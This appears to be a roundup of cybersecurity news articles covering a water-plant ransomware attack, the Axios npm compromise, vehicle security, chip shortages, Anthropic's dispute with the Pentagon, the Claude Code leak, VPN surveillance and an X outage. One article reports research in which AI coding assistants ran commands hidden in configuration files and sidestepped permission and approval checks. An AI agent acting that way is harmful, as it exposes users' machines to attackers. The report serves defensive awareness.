A water treatment facility in northern North Dakota was recently targeted in a ransomware attack, prompting operators to temporarily switch to manual monitoring of system gauges.

Officials from the City of Minot confirmed on Wednesday that despite the cyber incident, the region’s drinking water remained secure. In a letter submitted to the FBI, staff reported detecting the ransomware on March 14, which led to the use of “manual procedures” for approximately 16 hours until a replacement server was installed.

Jennifer Kleen, communications and engagement manager for Minot, explained that the ransomware affected the plant’s SCADA system, “which is kind of like a dashboard system. It brings all of those gauge readings to one spot.” While manual gauge checks are part of standard practice, employees had to perform them more frequently during the system outage.

The Minot water treatment plant supplies water to the city—home to around 50,000 residents—and surrounding communities under the Northwest Area Water Supply network, reaching a total of about 80,000 users.

Authorities discovered a ransom note on the compromised SCADA server, but it did not specify any payment demand. No ransom was paid, and officials have not identified the group responsible for the attack.

Recovery efforts are nearly complete, with the facility currently relying on an older server while preparing a new system. The city noted that the incident has created “opportunities for training exercises, improved communication, and preventative system design.” In a local television interview, City Manager Tom Joyce acknowledged that he would have convened a “crisis action team” earlier, including key officials, “to ensure we’re all on the same page right away.”

Cyber threats to water utilities have been on the rise, with groups linked to countries like China and Iran frequently targeting such infrastructure. A 2024 report by the Environmental Protection Agency’s Office of Inspector General highlighted multiple vulnerabilities across U.S. water systems. Out of more than 1,000 systems assessed—serving 193 million people—97 were found to have critical or high-risk vulnerabilities, while 211 had moderate to low-risk issues, including “having externally visible open portals.”

Government bodies at both federal and state levels have been pushing for stronger cybersecurity measures in the water sector. Proposed legislation aims to help smaller utilities modernize their systems and meet updated security standards. Meanwhile, New York recently introduced “first-in-nation” cybersecurity regulations, supported by funding for water treatment facilities.

However, experts warn that implementing such upgrades can take significant time—often months or even years—leaving systems exposed in the interim. Recent geopolitical tensions, including military actions involving the United States and Israel against Iran, have further heightened concerns. Information-sharing organizations, including the Water Information Sharing and Analysis Center, recently cautioned about a “highly volatile” threat landscape, warning of possible “increased cyberattacks from Iranian state-sponsored actors, hacktivists, and cybercriminal groups aligned with Iran.”

Axios Supply Chain Attack Exposes npm Security Gaps with Token-Based Compromise

 

A breach in the Axios library, one of the most widely used packages in modern web development, has exposed flaws that linger beneath surface-level fixes. Using stolen access, attackers slipped harmful updates into what users assumed was safe code. The event underscores how fragile trust can be even when the ecosystem claims stronger defenses: progress in verifying packages and securing logins is clearly incomplete if such exploits still succeed, and confidence in registries such as npm has been shaken by failures that feel both avoidable and familiar.

According to reports from Huntress and Wiz, attackers gained access to a lead developer's long-lived npm token. Through this entry point, altered builds of Axios were published: versions laced with hidden code that deployed a remote access tool targeting macOS, Windows, and Linux alike. The rogue releases stayed online for just under three hours before being taken down.

Axios ranks among the most popular JavaScript libraries, downloaded more than a hundred million times each week and found in roughly eight out of ten cloud environments. Moments after the tainted update went live, the malware began spreading fast; Huntress later verified infections on 135 machines during the window the compromised versions were available. The payload arrived through a third-party dependency, plain-crypto-js, which slipped into Axios's environment without touching its main codebase: not through direct code changes, but via a concealed payload activated after installation.
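Because the payload executed only after installation, one practical defense is to audit which installed packages declare scripts that npm runs automatically. A minimal sketch of such an audit (a hypothetical helper, not official npm tooling):

```python
import json
from pathlib import Path

# Lifecycle hooks that npm runs automatically during installation; a
# compromised dependency can abuse these to execute a payload the moment
# it lands on a developer's machine.
AUTO_RUN_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

def packages_with_install_hooks(node_modules):
    """Walk a node_modules tree and report packages whose package.json
    declares scripts that execute automatically at install time."""
    findings = {}
    for manifest in Path(node_modules).glob("**/package.json"):
        try:
            scripts = json.loads(manifest.read_text()).get("scripts", {})
        except (json.JSONDecodeError, OSError):
            continue  # skip unreadable or malformed manifests
        hooks = AUTO_RUN_HOOKS & set(scripts)
        if hooks:
            findings[manifest.parent.name] = sorted(hooks)
    return findings
```

In practice, npm's real `--ignore-scripts` install flag suppresses these hooks wholesale; a scan like the one above helps decide which packages genuinely need them.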

Once installed, it quietly deployed a remote access tool on developers' systems. Built to avoid notice, the malicious code erased itself under certain conditions and automatically restored altered components, masking the traces left behind. One reason this breach stands out is its method: it evaded defenses thought to be secure. Even after the project adopted standard safeguards such as OIDC-based trusted publishing and a hardened supply-chain model, outdated credentials remained active.

A leftover npm access key opened the door despite the stronger systems in place. Where two publishing paths existed, the original token took precedence, rendering the recent upgrades useless. This is now the third significant npm supply-chain breach in just a few months, following incidents such as Shai-Hulud.

Each time, attackers used compromised maintainer credentials to gain access, revealing a recurring weakness across the ecosystem. Although security professionals highlight the benefits of measures such as multi-factor authentication and provenance monitoring, these cannot block every threat once login data is exposed.

Under growing pressure, companies must scrutinize third-party dependencies, apply tighter rules on how software is installed, and phase out outdated access methods. When trust rests on open-source tools, weaknesses in credential handling can still invite breaches. This incident shows that flaws are not always in the code itself; sometimes they hide in how access is managed.

Cybersecurity Risks Rise as Modern Vehicles Become Complex Digital Ecosystems

 

Today’s vehicles have evolved into highly interconnected cyber-physical systems, combining mobile apps, backend infrastructure, over-the-air (OTA) update mechanisms, and AI-powered decision-making. This growing integration has significantly expanded the potential attack surface, introducing security risks that traditional IT frameworks were not designed to address. As a result, vulnerabilities are increasingly surfacing across the entire automotive ecosystem.

"Unlike a traditional IT system, like a mail server or your home network, the worst case scenario involves things like safety implications or real-world operational disruptions like closing down a road or being able to cause damage to the environment," said Kamel Ghali, vice president at Car Hacking Village.

With the shift toward software-defined vehicles and reliance on OTA updates, cars are beginning to inherit many of the same security weaknesses seen in conventional IT systems. At the same time, the integration of artificial intelligence introduces new concerns, as these models—now responsible for safety-critical decisions—must be safeguarded against manipulation or external interference, Ghali noted.

During a video interview with Information Security Media Group at the RSAC Conference 2026, Ghali further highlighted several key developments. He explained that the automotive supply chain is increasingly investing in cryptographically secure processors to gain a competitive edge. 

He also pointed out that threat modeling in the automotive sector is expanding beyond traditional IT considerations to address safety, operational continuity, and environmental impact. Additionally, he emphasized that maintaining supply chain integrity will likely emerge as the most significant long-term cybersecurity challenge for the automotive industry.

Ghali brings over seven years of expertise in automotive cybersecurity, specializing in ethical hacking, penetration testing, training, and product security. He is an active contributor to the global cybersecurity community, leads outreach initiatives for the DEF CON Car Hacking Village, and plays a key role in raising awareness about vehicle security risks.

AI Datacenter Boom Triggers Global CPU and Memory Shortages, Driving Price Hikes

 

Spurred by growing reliance on artificial intelligence, datacenter buildouts are pushing chip production to its limits: shortages once limited to memory chips now affect core processors too. With demand for AI-optimized facilities still climbing, industry leaders say delivery delays and cost increases may linger well into the coming decade.

Top chip producers such as Intel and AMD are struggling to keep up with processor demand. Because of tighter supplies, computer and server builders receive fewer chips than ordered, slowing assembly, pushing shipment timelines out, and lifting prices by roughly 10 to 13 percent. Companies are bracing for longer waits and steeper costs: major suppliers such as Dell and HP have lately reported deepening shortages, with server parts now taking months rather than weeks to arrive. Delays that were once rare are becoming routine.

Experts expect disruptions to worsen into early 2026, straining business systems and home buyers alike. As CPU availability shrinks, pressure grows on a memory market already under strain: AI-driven datacenter projects have sharply increased demand for DRAM and NAND, shifting production lines away from devices like smartphones and laptops. As a result, newer technology such as DDR5 costs more than before, making upgrades less appealing, and many people are holding onto older machines, especially those running DDR4, simply because replacing them feels too costly.

Nowhere is the strain more visible than in everyday device markets. Higher component costs translate directly into steeper laptop prices and slower release cycles. Valve, for example, has paused its Linux-powered compact desktop, held back by material shortages, while Micron has stepped away from selling memory modules to consumers to focus on large-scale computing and AI customers. Shifts like these reveal where the sector's attention now lies.

As challenges mount for legacy chip producers, new players are stepping in. Arm has launched its first self-designed CPU, built specifically for AI workloads, and big names such as Meta, Cloudflare, OpenAI, and Lenovo are paying attention, drawn by the fresh potential.

With shortages ongoing, market projections point to extended disruptions through the 2030s, reshaping how prices evolve and the pace of advances in chips and computing systems.

Judge Blocks Pentagon's Retaliatory AI Ban on Anthropic

 

A federal judge has temporarily halted the Pentagon's effort to designate AI company Anthropic as a supply chain risk, ruling that the move appeared driven by retaliation rather than legitimate security concerns. In a 48-page order, U.S. District Judge Rita Lin, appointed by former President Joe Biden, granted Anthropic a preliminary injunction against 17 federal agencies, including the Pentagon, preventing them from enforcing the ban until the lawsuit concludes. This keeps Anthropic's Claude AI accessible to government users amid escalating tensions over military contracts. 

The conflict erupted during negotiations to expand a $200 million Pentagon contract with Anthropic. Anthropic refused proposed language permitting "all lawful use" of its AI, citing risks like mass surveillance or autonomous weapons—a stance CEO Dario Amodei publicly emphasized. In response, President Donald Trump posted on Truth Social on February 27 directing agencies to "IMMEDIATELY CEASE all use of Anthropic’s technology," while Defense Secretary Pete Hegseth announced on X that no military partners could engage with the firm. 

On March 4, the administration formalized the designation under two statutes: 41 USC 4713 for federal-wide restrictions and 10 USC 3252 for Defense Department-specific actions. Anthropic swiftly filed lawsuits in California's Northern District and the DC Circuit, arguing the labels were pretextual punishment for its ethical safeguards. Judge Lin agreed, noting the government's shift from contract disputes to broad bans suggested improper motives. 

Pentagon Chief Technology Officer Emil Michael countered on X that Lin's order contained "dozens of factual errors" and insisted the 41 USC 4713 designation remains in effect, as it falls outside her jurisdiction. Anthropic welcomed the swift ruling, reaffirming its commitment to safe AI while awaiting DC Circuit decisions. Legal experts are split: some see the injunction as limited, potentially leaving parts of the ban intact.

This case underscores deepening rifts between AI firms and the government over technology controls in national security. It raises questions about executive power to penalize contractors, the role of public statements in legal proceedings, and AI deployment ethics amid rapid advancements. As appeals loom in the 9th Circuit, the dispute could drag on for years, impacting federal AI adoption and Anthropic's partnerships.

Anthropic Claude Code Leak Sparks Frenzy Among Chinese Developers

 

A fresh wave of interest swept the tech world after Anthropic's code surfaced online, drawing especially sharp focus from developers in China. The exposure came through a misstep: a coding tool was shipped with internal layers exposed, revealing structural choices usually kept private. Details once locked away now show how design decisions shape performance behind the scenes.

Even though the breach was fixed quickly, the consequences moved faster. Around the globe, coders began studying the files, but the reaction surged most sharply in China, where Anthropic's systems have no official presence. Using VPNs, developers raced to download copies of the leaked source before any takedown could reach them.

Chatter about the event quickly spread across China's social networks, as engineers began unpacking Claude Code's architecture in granular posts. Though unofficial, the exposed material revealed inner workings such as memory management, coordination modules, and task-driven processes: elements that shape how automated programming tools operate outside lab settings.

Although the leak left model weights untouched (the core asset in closed AI frameworks), specialists emphasize the value of what did emerge. It reveals how raw language models are turned into working tools, uncovering choices usually hidden behind corporate walls. The engineering trade-offs now sit in plain sight, changing who gets to learn them, and some experts believe access to these details could accelerate progress at competing AI firms.

According to one engineer in Beijing, the exposed documents were like gold, offering real insight into how advanced tools are built. Teams operating under tight constraints suddenly found themselves looking at high-level system designs they would normally never encounter. When Anthropic reacted, the exposed package was quickly pulled down, with removal notices sent to sites such as GitHub.

Yet before those steps took effect, duplicates had spread widely and now sit in numerous code archives; complete containment became nearly impossible. The episode raises questions about how AI firms manage internal safeguards and information flow, and it underscores worldwide interest in advanced AI systems, especially in regions where availability is restricted by political or legal barriers.

The attention also highlights how hard it is for businesses to protect private data in fast-moving AI fields where the pressure never lets up.

US Lawmakers Question VPN Surveillance, Seek Transparency on Privacy Risks

 

American lawmakers are demanding clearer rules on government tracking of online tools such as virtual private networks. In a letter to Director of National Intelligence Tulsi Gabbard, six congressional Democrats, including Ron Wyden, press for answers about access to personal information routed abroad through these encrypted channels, amid growing questions about how much unseen oversight occurs beyond U.S. borders.

Although the letter stops short of claiming active surveillance, it highlights unease over how VPN usage could endanger personal privacy, particularly when evidence is gathered without warrants. Because these officials are cleared for classified briefings, their inquiries may reflect threats not yet made public. A VPN reroutes traffic through distant servers, masking a person's actual location online.

VPN hubs in different countries handle masses of connections simultaneously, merging streams and blurring origin points across regions. The lawmakers point out that such pooling could draw surveillance interest, and shared infrastructure raises quiet questions about oversight. A central worry is how the National Security Agency uses its powers under Section 702 of the Foreign Intelligence Surveillance Act, which allows it to monitor people outside the U.S. without a warrant.

Concerns persist because such monitoring often sweeps up communications tied to Americans, especially when vast amounts of data are collected at once. The lawmakers note that current rules treat people as being overseas when their whereabouts are uncertain or appear to be outside American territory. Because VPNs mask where users actually are, citizens could fall under surveillance without standard safeguards applying: tools designed for privacy may place domestic activity into international categories by default.

Although some agencies promote VPN usage for better digital safety, the letter raises concerns about mixed signals in public guidance: individuals might overlook hidden monitoring risks when connecting through foreign servers, despite earlier recommendations favoring such tools. The legislators are urging intelligence agencies to explain whether VPN usage affects personal privacy and to offer ways people can shield their data more effectively.

Open dialogue matters, they argue, because without it U.S. citizens cannot weigh digital risks wisely. The dispute reflects a broader strain in today's connected world, where national security demands often clash with personal data rights. As connections cross borders effortlessly, control over information becomes harder to define; what feels necessary for defense may still erode trust, and in digital spaces without walls the balance remains fragile.

AI Coding Assistants Expose New Cyber Risks, Undermining Endpoint Security Defenses

 

Artificial intelligence now shapes much of online security, and new research suggests it may be eroding essential protection layers. At the RSAC 2026 conference in San Francisco, the issue came sharply into focus when Oded Vanunu, a senior technology executive at Check Point Software, took the stage.

His message: AI tools that help write code could open the door to fresh risks on user devices. Assistants such as Claude Code, OpenAI Codex, and Google Gemini carry hidden flaws despite their popularity, Vanunu argued. Although they speed up work for programmers, deeper issues emerge beneath the surface: security measures that have stood firm for years now face quiet circumvention, and what looks like progress can also open backdoors by design.

Despite recent gains in endpoint protection, including real-time threat tracking, isolated testing environments, and cloud-hosted setups, an unforeseen setback is emerging. AI assistants used in software development demand broad access to local machines, configuration files, and network connections. Because developers routinely grant that control, unseen doors open.

These openings can be exploited by hostile actors. Vanunu likened today's endpoints to a once-solid fortress now under pressure from AI agents wielding elevated access: tools that automate actions and interface deeply with system settings slip past conventional defenses, which cannot track such dynamic activity. A silent blind spot forms where attackers can quietly move in.

One key issue identified in the study involves the exploitation of configuration files such as .json, .env, or .toml. Rarely seen as harmful, these file types typically escape scrutiny during security checks, yet hostile code can hide within them. Because systems frequently treat such documents as safe, automated processes, including AI-driven ones, can run embedded commands without raising alarms.

Such embedded commands open a path for intrusion that skips conventional malware components entirely. The research also uncovered unexpected weaknesses in the AI coding tools themselves: flawed command handling, permission checks that could be sidestepped to allow unauthorized operations, dangerous instructions that could run without clear user consent, previously approved tasks that could be silently altered to insert harmful elements, and remote activation of external code. Approval processes also failed under manipulated inputs during testing.

Even after these flaws were fixed, one truth stands clear: security boundaries keep shifting because of artificial intelligence. Tools meant to help coders now open new doors for attackers; the focus of attack has moved from systems to everyday software assistants, and fixing old problems does not stop newer risks from emerging through trusted workflows.

Every AI tool in use deserves a fresh review. One way forward is to isolate coding assistants in locked-down environments where they cannot reach sensitive systems, and configuration files deserve as much scrutiny as programs that run directly. As more companies adopt AI, old-style defenses may no longer fit the dangers now appearing.
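The config-file vector described in this piece can be screened for mechanically: walk parsed configuration data and flag values that look like embedded shell commands. A minimal sketch with deliberately simple, illustrative heuristics (real scanners use far richer rules):

```python
import re

# Substrings that rarely belong in benign configuration values. These
# heuristics are illustrative assumptions, not a complete rule set.
COMMAND_INDICATORS = re.compile(
    r"(\$\(|`|;\s*(curl|wget|sh|bash|powershell)\b|&&\s*(curl|wget)\b)",
    re.IGNORECASE,
)

def scan_config_values(config, path=""):
    """Recursively walk a parsed config (e.g. loaded from a .json or
    .toml file) and report keys whose string values look like embedded
    shell commands."""
    hits = []
    for key, value in config.items():
        where = f"{path}.{key}" if path else key
        if isinstance(value, dict):
            hits.extend(scan_config_values(value, where))
        elif isinstance(value, str) and COMMAND_INDICATORS.search(value):
            hits.append(where)
    return hits
```

A value like `"make && curl http://example.com/x | sh"` under a build hook would be reported by its dotted key path, giving reviewers a short list of settings worth a second look before an AI assistant is allowed to act on the file.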

X Faces Global Outage Twice in Hours, Thousands of Users Report Access Issues

 

Fresh disruptions hit X, formerly Twitter, twice within hours, as glitches blocked access for thousands of people across regions. Though brief, the lapses add to unease over the platform's stability under Elon Musk's control, following a string of recent breakdowns: the service is simply faltering too often.

According to Downdetector figures, disruptions began in the early afternoon across the U.S., peaking near 3:50 PM EST with about 25,000 affected users. Later that evening, around 8:00 PM EST, a second wave emerged, with more than 6,000 people reporting login difficulties.

Problems surfaced across multiple areas, according to user feedback. Close to fifty percent struggled just to open the app on their phones; others saw broken features in the feed or site navigation failing mid-use. The interruptions were global, hitting people in UK cities and Indian towns alike.

India initially reported fewer incidents, but the second wave brought a clear rise, with more than six hundred alerts by dawn. Data from StatusGator backed the picture of two separate waves hitting at different times.

Despite the widespread problem, X stayed silent on the cause. Users asking about the glitches did get answers from Grok, the platform's built-in chat assistant, which said a system hiccup had stopped feeds from refreshing and that pages showed errors instead of content during the episode. Based on past patterns with similar faults, the bot suggested a fix could come quickly.

Frustration spread through user communities as the service went down unexpectedly. Online spaces filled with accounts of the downtime: some saw pages fail to load halfway, others found nothing loaded at all, and reports pointed to repeated problems over recent weeks rather than isolated moments.

The picture that emerges is not sudden failure but lingering instability. Still reeling from the latest outage, X faces mounting pressure as service disruptions chip away at its reliability worldwide. With each failure, trust erodes a bit more among users who depend on steady access; fixes appear slow, inconsistent, or both, and what looked like progress now seems fragile under repeated strain.